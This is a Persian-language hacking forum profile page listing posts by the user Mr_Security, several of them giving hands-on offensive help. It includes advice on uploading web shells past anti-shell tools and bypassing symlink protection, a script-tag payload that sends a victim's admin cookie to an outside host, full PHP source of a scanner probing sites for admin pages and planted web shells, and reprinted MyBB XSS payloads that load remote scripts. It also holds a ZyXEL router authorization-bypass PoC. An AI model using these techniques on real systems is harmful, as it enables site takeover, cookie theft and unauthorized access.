رفتن به مطلب

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

Mr_Security

Member
  • تعداد ارسال ها

    65
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    1

تمامی مطالب نوشته شده توسط Mr_Security

  1. Mr_Security

    انجام تنظیمات سمت سرور

    نمیدونم چجوری دارید فایل اپلود میکنید طبق این فیلم جلو برید اپلود شل در whmcs اگر به نتیجه ای نرسیدید اعلام کنید
  2. Mr_Security

    انجام تنظیمات سمت سرور

    دوست عزیز باید موضوع شرح بدید اگر فایل اپلود می کنید اپلود میشه بعد پاک میشه ؟ .. خود انتی شلر سرور هست اگر پرمیشن اپلود فایل ندارید از پنل whmcs محدودیت ایجاد شده ... مورد اول از شلر های استفاده کنید که انتی شلر ها رو بایپس میکنه توی همین انجمن پر از این ابزار مورد دوم : 1 - میشه فایل php اپلود کرد اگر پرمشین نداشت php میتونید از منو تب قالب سایت شل را بصورت زیپ همراه با قالب سایت ایپورت کنید
  3. Mr_Security

    انجام تنظیمات سمت سرور

    سلام بله قبلا همچین مواردی برخورد کرده بودم قابل بایپس هستند باید نکات امنیتی رعایت کنید دلخوش به فایروال ها و .. و پلاگین های امنیتی نباشید تغییرات امنیتی بصورت دستی اعمال کنید
  4. سلام دوست عزیز باگ اول مربوط به xss میباشد حمله Cross-site scripting یا XSS یک نوع حمله تزریق کد می‌باشد که در سمت کاربر اتفاق می‌افتد و در آن حمله کننده می‌تواند کد و اسکریپت مخرب خود را در قالب یک فعالیت معمولی به وب‌سایت تزریق کند اول کار کشیدن کوکی ادمین است این دستور اجرا کنید و خروجی را اطلاع بدهید در تاپیک <script type=“text/javascript”>document.location=“http://target.com/?c=“+document.cookie;</script> ابزار های که بصورت اتوماتیک میشود بهترین بهرمندی رو ببرید XSSer , beef xss هست در مورد باگ دوم RCE خدمتتون عرض کنم احتمال 90% خطای اسکنر می باشد طبق تجربه 😁
  5. Mr_Security

    نحوه بایپس سیملینک در Litespeed - Cagefs

    سلام چندین موارد هست باید تست کنید البته فکر کنم اخرین ورژن کلودلینوکس خیلی از بایپس ها رو فیکس کرده درون فولدر که سیملینک زدید رو htaccess ادیت کنید و لاین اخر htaccess اینطوری وارد کنید readmename file.txt فایل که توی سرور شورکات کردید وارد نماید اگر این روش کار کند باید تو ایندکس اف برای شما اظلاعات فایل تکست نمایش داده خواهد شد -------- روش دوم بیشتر روی سرور لایت اسپید جواب میده : توی پوشه ی ایندکس اف این اپلود کنید,این فایل دقیقا میاد با استفاده از فانکشن file_get_contents برای شما فایل ها رو سرور فراخوانی میکنه فایل پیوست شد HEADER.zip
  6. Mr_Security

    ایجاد بک دور به سیستم بدون داشتن Ip Public

    سلام برای backconnect بدون ای پی ولید باید اول توی موردم port forwarding کنید و سپس مودم رو روی حالت bridge قرار دهید و وقتی تغییرات اعمال دادید فایروال ویندوز و انتی ویروس خود را ببندید و برید سراغ backconnect
  7. سلام و تشکر بابت اکسپلویت ها برای قشنگ تر و حرفه ای شدن کار بهتر اینجکت کامل تارگت درون اکسپلویت های که ثبت میکنید قرار دهید تشکر
  8. Mr_Security

    مشکل در اینجکت کردن تارگت

    سلام دوست عزیز فکر کنم سایت بسته شده و فعال نیست که تست کنم
  9. سلام دوتاشون از نظر امنیت ضعف های دارند LibreOffice در چندین هفته های اخیر چندین باگ با سطح دسترسی بالا داد در حال حاضر بهتر نکات امنیتی رعایت کنید و محدودسازی دسترسی و ایزوله نمودن برنامه استفاده کنید
  10. سلام بهترین ابزار که میتونم توی این حوزه بهتون معرفی کنم Maltego هست اطلاعات بصورت جامع در اختیارتون قرار میدهد قابلیت ها : People Groups of people (social networks) Companies Organizations Web sites Internet infrastructure such as: Domains DNS names Netblocks IP addresses Phrases Affiliations Documents and files These entities are linked using open source intelligence.
  11. سلام دوست عزیز برای اطلاع بیشتر از نوع این حملات این مقاله را مطالعه کنید
  12. سلام دوست عزیز در قسمتی که قصد دارید فایل اپلود کنید درون htaccess اون فولدر php رو فیلتر کرده و اجازه اپلود نمیده و منطقی هم هست و بایپس خاصی نداره در صورتی که شما بتوانید فایل htaccess خودتون اپلود کنید که مجوز اپلود php رو داشته باشه
  13. Mr_Security

    نفوذ به شبکه و راه مقابله ان

    سلام دوست عزیز بیشتر شرکن و کمپانی ها بزرگ شبکه هستند و شما اگه بخواهید وارد شبکه لوکال شوید حتما باید شل یا دسترسی به شکل ریموت داشته باشید و در غیر این صورت امکان پذیر نمی باشد مثال * برای نفوذ به شبکه راه های زیادی داره بصورت ریموت آسان ترین راه میشه گفته اسکن رنج آی پی شبکه مثال 192.168.1.1 تا .192.168.1.255 میتوانید از (متاسپلویت GUI) کمک بگیرید چو این ابزار علاوه بر اسکن رنج ای پی اکسپلویت و اسیب پذیر های روز رو بر روی شبکه تست میکند
  14. Mr_Security

    فایل Xls یا بد افزار

    سلام دوست عزیز برای تست این جور فایل ها و انالیز کردن بهتر است انهارو که هیچ گونه خطری هم برای شما نداشته باشد و یک آزمایشگاه امنیت برای خودتان ایجاد کنید توصیه و نظر شخصی من اینه که شما بروی سیتم خود vmware نصب کنید وروی vmware یک ویندوز بوت کنید و بهتراست که روی ویندوز جدید که روی vmware نصب کردید سندباکس استفاده کنید این فرضیه کاملا امنیت شمارو حفظ میکند و باحتی میتوانید فایل های مخرب هم باز کنید چون بصورت فیرز هست خطری برای شما ندارد در واقع میشه گفت بهترین ازمایشگاه تحلیل بدافزار تشکر
  15. سلام از این شل در فیلم استفاده شده لینک داخل شل روی cgi telnet run bypass کلیک کن
  16. سلام دوست عزیز لطفا فایل های خود را در انجمن پیوست کنید و سعی کنید فیلم های اموزشی که میسازید اختصاصی این انجمن باشه ممنون
  17. Mr_Security

    Irancyber [php] Wp Cracker

    سلام دوست عزیز خوش آمدید لطفا لینک https://github.com و یک عکس از اسکریپ و توضیحاتی اگر هست مطرح کنید که پست شما کامل و صحیح باشه باتشکر
  18. سلام دوست عزیز به نظر بنده بهتر برای هاست های اشتراکی از cloud linux استفاده کنید کاملا سیملینک در سرور پچ میکنه cloud linux : یه ابزار امنیتی لینوکس هست کارش ایزوله (جدا سازی) کردن یوزر ها از هم و جلوگیری از حملات سیملینک در سرور میگیره اگر دوستان میتونند حالت عادی سیملینک پچ کنند یک امر بسیار موفقیت امیزی هست و دوستان کسی اطلاعتی داشت شیر کنند
  19. Mr_Security

    تاپیک سایت های مفید

    یه وب سایت خوب برای بایپس کلود http://iphostinfo.com/cloudflare/
  20. سلام اسکریپت برای پیدا کردن ادمین پیج و پیدا کردن شل برو روی وب سایت ها <?php @session_start(); @error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('display_errors', 0); @set_time_limit(0); /* Name app : Admin page & Backdoor Scanner Author / Editor Script : AZZATSSINS CYBERSERKERS Email : [email protected] */ echo'<html> <title>Backdoor & Admin Page Finder</title> <body bgcolor=silver><center> <u><i><b><h1>© AZZATSSINS CYBERSERKERS</h1> </b></i></u><br> <form method="POST"> <font size="3" face="Orbitron" color="tan">URL <input type ="text" name="site" /> <font size="3" face="Orbitron" color="tan">Search : <select name="search"> <option value="xhell">Backdoor</option> <option value="php">Admin Page</option> <input type = "submit" name="submit" value="Find" /> </form><br><br> '; if(isset($_POST['submit']) && !empty($_POST['site'])) { $url = $_POST['site']; $search = $_POST['search']; switch($search) { case 'php': s_php($url); break; case 'xhell': s_xhell($url); break; default: echo "<br>Please select a item to search ... "; break; } }elseif(isset($_POST['submit']) && empty($_POST['site'])) { echo "Please enter the URL currently and try again ..."; } function s_php($get_url) { $pages = array('/redaktur','/webadmin','/adminweb','/[email protected]','/operator','/webmaster','/[email protected]','/[email protected]','/administrator','/admin_area','/login_area','/admin','/sign_in','/login','/superuser','/log-in','/bb-admin','/wp-login.php','/admin_login','/moderator','/po-admin','/management','/manage','/phpmyadmin','/phpMyAdmin','/PMA','/phpmysql','/pmadmin','/user'); find_admin($pages,$get_url); } function s_xhell($get_url) { $pages = array('/symlink','/sym','/dm1sym','/asu.txt','/DecW.txt','/idx_config','/idx_cgi','/wso.php','/idx.php','/dm.php','/DM5.php','/1n73ct10n.php','/shell.php','/r00t.php','/idb.php','/idb.phtml','/sabun.php','/r00t.pl','/z.php','/.php','/sh3ll.php','/xploit.php','/sa.php','/-.php','/_.php','/&.php','/$.php','/indoxploit.php','/indoXploit.php','/jembutmu.php','/jembutku.php','/indo.php','/upload.php?option=upload','/simple.php','/k3ll3d.php','/shellx.php','/kill.php','/whmkiller.php','/tools.php','/indexx.php','/shell.phtml','/shell.php.jpg','/unix.php','/b374k.php','/irdb.php','/mig3r.php','/cp.php','/cpanel.php','/indeshell.php','/cmd.php','/upl.php','/shell.txt','/unknown.txt','/root.txt','/haxor.img','/haxor.ht','/anon.txt','/c99.php','/wp-content/plugins/akismet/akismet.php','/wp-content/plugins/akismet/index.php','/d.php','/hmm.php','/include.php','/up.php','/gaza.php','/dz1.php','/priv8.php','/andela.php','/a.php','/css.php' ); find_admin($pages,$get_url); } function find_admin($pages_list,$url) { set_time_limit(0); $find = false; foreach($pages_list as $key => $value) { $c_start = curl_init(); curl_setopt($c_start,CURLOPT_AUTOREFERER,1); curl_setopt($c_start, CURLOPT_RETURNTRANSFER, 1); curl_setopt($c_start, CURLOPT_HEADER, 1); curl_setopt($c_start, CURLOPT_URL, $url.$value); $result = curl_exec($c_start); curl_close($c_start); if (preg_match("/200 OK/", $result)) { echo "<br /> <h3> Found :<a href='".$url.$value."'>".url.$value."</a> </h3> <br />"; $find = true ; } } if(!$find) { echo "<h3>Sorry i cant find it </h3>"; } } ?>
  21. Mr_Security

    Mybb 1.8.6 - Cross-site Scripting

    سلام خدمت دوستان عزیز چندروز اخیر اسیب پذیری پاپلیک شد از MyBB 1.8.6 باگ از نوع xss این باگ در هسته بوده و در ورژن 1.8.7 فیکس شده آسیب پذیری : 1. Introduction Affected Product: MyBB 1.8.6 Fixed in: 1.8.7 Fixed Version Link: http://resources.mybb.com/downloads/mybb_1807.zip Vendor Website: http://www.mybb.com/ Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 01/29/2016 Disclosed to public: 09/15/2016 Release mode: Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview MyBB is forum software written in PHP. In version 1.8.6, it contains various XSS vulnerabilities, some of which are reflected and some of which are persistent. Some of them depend on custom forum or server settings. These issues may lead to the injection of JavaScript keyloggers, injection of content such as ads, or the bypassing of CSRF protection, which would for example allow the creation of a new admin user. 3. Details XSS 1: Persistent XSS - Signature CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N Description: The profile editor of the moderator control panel does not properly encode the signature of a user when editing it. Because of this, a user can create a specifically crafted signature and - once a moderator or admin visits the profile editor for that user - the injected code will be executed in the context of the victims browser. Proof of Concept: Visit the profile at: http://localhost/mybb_1806/Upload/modcp.php?action=editprofile&uid=[uSER_ID] As signature, use: </textarea><img src=no onerror=alert(1)> XSS 2: Persistent XSS - Forum Post (depending on forum settings) CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description: An admin can allow HTML input for specific forums via the setting allowhtml. There are various filters in place which intend to make this safe, which may leave the admin with the impression that it is indeed safe. However, there are various possibilities to bypass these filters, mainly using HTML5 features. Proof of Concept: <body onpageshow=alert(1)> -> Visiting the post will trigger the code <div contextmenu="mymenu" oncontextmenu=alert(1)>context menu</pre> -> A right-click will trigger the code <form action=""> Enter something: <input type="text" name ="myinput" oninput="alert(1)"><br> <input type="submit" value="Submit"> </form> -> Input into the field will trigger the code <form action=""> <input type= "text" name="myinput" oninvalid="alert(1)" required> <input type="submit" value ="Submit"> </form> -> A click on submit will trigger the code There are various other attributes which may also work, such as onsearch, onkeydown, onkeyup, ondrag, onscroll, oncopy, and so on. Other attributes such as onMouseOver or onFocus are filtered out. XSS 3: Persistent XSS - Username (depending on forum settings) CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N Description: The username is echoed unencoded in the user area. As the login does not have CSRF protection and as an admin can be logged into the admin area with a different account than the one they are logged into the forum, a persistent XSS vulnerability in the user area can be exploited. However, successful exploitation most likely requires a username length of at least 43 characters, which is more than the default settings allow. Simple Proof of Concept: 1. register user with name f" onmouseover="alert(1)" b=" 2. login and visit http://localhost/mybb_1805/Upload/usercp.php 3. hover over the avatar The simple proof of concept can be improved to allow successful exploitation. It is not required for the victim to hover over the avatar or interact with the webpage in any way: 1. As username, use: f" onerror="alert(1)" b=" 2. Set an avatar, and use a URL as source (not an image upload) 3. Delete the image from the remote host, making it unavailable, thus triggering an error and executing the injected code. Possible Payloads: Loading a script with vanilla javascript takes a lot more characters than are allowed in a username by default: "onerror="s=document.createElement('script');s.src='http://localhost/s.js'; document.getElementById('top').appendChild(s)" As jQuery is loaded, this can be optimized: "onerror="$.getScript('http://aa.bc/s.js') Executing the payload for a victim: The attack does not require the victim to not be logged in as normal user, as one can login even when already logged in. The login as a normal user also does not affect the login as admin. Thus, an attacker could use the following payload to log a victim in and redirect them to the site containing the payload: <iframe id="myframe" style="display: none" name="myframe" src="about:blank"></ iframe> <form method="post" action="http://localhost/mybb_1805/Upload/ member.php" target="myframe" id="myform" name="myform"> <input name="action" type="hidden" value="do_login" /> <input name="url" type="hidden" value="http:/ /localhost/mybb_1805/Upload/usercp.php" /> <input name="quick_login" type= "hidden" value="1" /> <input name="quick_username" type="hidden" value= ""onerror="$.getScript('http://localhost/s.js')" /> <input name= "quick_password" type="hidden" value="123456" /> <input name="quick_remember" type="hidden" value="yes" /> </form> <script>document.myform.submit();</script> It will automatically log the victim in and redirect them to the page that triggers the script execution. No action of the victim is required. The loaded script could for example perform a backup of the database and then send the attacker the name of the backup, as backups are stored in a public directory. XSS 4: Persistent XSS - Post Attachment (depending on server settings) CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description: Attachments are uploaded to a public directory, and their extension is changed to .attach. Files with extension .attach that contain HTML code are interpreted as HTML files by some default server configurations (for example Apache). Additionally, the directory where the files are uploaded to does not prevent directory listing via an index.html file as all the other directories of MyBB do. Because of this, an attacker can find the name of the file and send it to a victim. Once the victim visits the link, the JavaScript code in the file would execute. Proof of Concept: 1. upload HTML file containing <html><body><script>alert(1);</script></body></ html> 2. find file located at /mybb_1805/Upload/uploads/YYYMM/ RANDOM_STRING.attach. The YYYMM directory is not protected against directory browsing via an index.php or index.html file like most other directories of MyBB, which means depending on the server configuration, the file can easily be found 3. send admin there XSS 5: Reflected XSS - Account Activation CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description: The account activation form echoes a given code unencoded to the user, resulting in reflected XSS. Proof of Concept: http://localhost/mybb_1806/Upload/member.php?action=activate&uid=-1&code="> <script>alert(1)<%2fscript> XSS 6: Reflected XSS - Update (depending on locked state) CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N Description: In many of the update scripts, POST values are echoed without proper encoding. The scripts are upgrade3.php, upgrade12.php, upgrade13.php, upgrade17.php, and upgrade30.php. As this attack only works when the forum is disabled, the forum itself cannot be attacked, but the attack could be used to attack other software hosted on the same domain. Proof of Concept: <form id="myForm" action="http://localhost/mybb_1805/Upload/install/ upgrade.php" method="POST"> <input name="action" value="30_dbchanges_ip"> <input name="iptask" value="5"> <input name="iptable" value="7"> <input name= "ipstart" value="<script>alert(1)</script>"> <input type="submit" value= "Submit"> </form> <script> document.getElementById("myForm").submit(); </ script> XSS 7: Reflected CSS Injection CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N Description: When displaying an error, MyBB echoes user input in a style context, allowing an attacker to inject CSS. With this, it may be possible to change the look of the website or extract information, and it may lead to XSS in older browsers. Proof of Concept: This script submits a search, which will trigger an SQL error because of the non-existing author. All it does then is change the background color of the error report to black to show the existence of the injection: <form id="myForm" action="http://localhost/mybb_1805/Upload/search.php/) ; } %23error { background: %23000000; } /*" method="POST"> <input name="action" value="do_search"> <input name="author" value="nonexistentauthor"> <input name= "matchusername" value="1"> </form> <script> document.getElementById ("myForm").submit(); </script>
  22. سلام اسیب پذیری جدید از روترهای ZyXEL نوع حملات بصورت Bypass Vulnerability هست این اسیب پذیری در سطح امنیتی Medium قرار دارد Document Title: =============== ZyXEL DEL1201-T10A Authorization Bypass Release Date: ============= 2016-nov-03 Timeline: ========= 2016-oct-30 --> Discovered 2016-oct-30 --> Reported To Vonder 2016-nov-02 --> Vondder Dosn't Reply 2016-nov-03 --> Published Exploitation Technique: ======================= Local Exploit Severity Level: =============== Medium Affected Model(s): ================== DEL1201-T10A Vulnerability Typus: ==================== Authorization Bypass Product & Service Introduction: =============================== Focused on innovation and customer-centricity, Zyxel Communications Corp. has been connecting people to the internet for nearly 30 years. We keep promoting creativity which meets the needs of customers. This spirit has never been changed since we developed the world's first integrated 3-in-1 data/fax/voice modem in 1992. Our ability to adapt and innovate with networking technology places us at the forefront of understanding connectivity for telco/service providers, businesses and home users. We're building the networks of tomorrow, helping unlock the world's potential and meeting the needs of the modern workplace; powering people at work, life and play. We stand side-by-side with our customers and partners to share new approaches to networking that will unleash their abilities. Loyal friend, powerful ally, reliable resource — we are Zyxel, Your Networking Ally. (Copy of the Homepage: https://www.zyxel.com/about_zyxel/company_overview.shtml ) Description: ============ ZyXEL DEL1201-T10A Modem Default Password is : admin In RealyIf Network Administrator Change The The Default Password To Any , We Can't Access To Modem Settings . Because We Don't Know New Password . But Authorization Bypass Access We To Change Modem Settings ! Technical Details: ================== an Authorization Bypass That Access To Edit/Change Modem Wireless Settings ! Proof of Concept (PoC): ======================= Manual Steps To Reproduce The Local Vulnerability ... 1. Connect To Modem 2. Enter Modem Gatway Address To Browser (url:192.168.1.1) 3. Enter This String To Password Field -> user 4. Now You Can Change Wireless Settings..! Credits & Authors: ================== Mohammad Reza Fathi Source: =======
  23. Mr_Security

    آموزش Sql Map

    سلام دوست باتشکر از فعالیت شما لطفا فایل های خودرا در انجمن پیوست کنید برای عمر ماندگاری بیشتر باتشکر
  24. با سلام این فایل رو دانلود کنید https://github.com/kennethreitz/requests و از حالت ریپ خارج کنید و فایل های داخل پوشه کپی کرده و در پوشه ای که پایتون نصب کردید انتقال بدید باتشکر
  25. سلام پرمیشن رو 0644 قرار دهید مشکل تان حل میشود تشکر

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...